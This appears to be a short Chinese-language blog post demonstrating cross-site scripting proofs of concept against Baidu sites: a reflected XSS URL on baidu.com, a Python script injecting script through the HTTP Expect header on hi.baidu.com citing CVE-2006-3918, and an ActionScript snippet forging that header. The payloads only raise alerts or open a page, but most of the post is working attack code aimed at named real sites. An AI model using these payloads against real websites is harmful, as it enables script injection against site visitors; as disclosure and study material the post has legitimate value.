Nov 14
1. 灌水
- http://www.baidu.com/index.php?tn="><script>alert('xxs')</script>
2. hi.baidu.com XXS
- #! /usr/bin/python
- #coding=gb2312
- from httplib import HTTPConnection
- conn = HTTPConnection('hi.baidu.com', 80)
- conn.putrequest('GET', '/')
- conn.putheader('Host', 'hi.baidu.com')
- conn.putheader('Content-Type', 'text/xml; charset=”utf-8″')
- conn.putheader('Expect', '<body onload=window.open("http://www.google.com")>')
- conn.endheaders()
- r = conn.getresponse()
- print r.read()
利用的漏洞是 CVE-2006-3918
http://www.securityfocus.com/bid/19661
构造swf 可以利用此漏洞
- var req:LoadVars=new LoadVars();
- req.addRequestHeader("Expect",
- "<script>alert('gotcha!')</script>");
- req.send("http://www.target.site/","_blank","GET");
BTW: wordpress 这个写日志的地方也跨站了 -__-
Recent Comments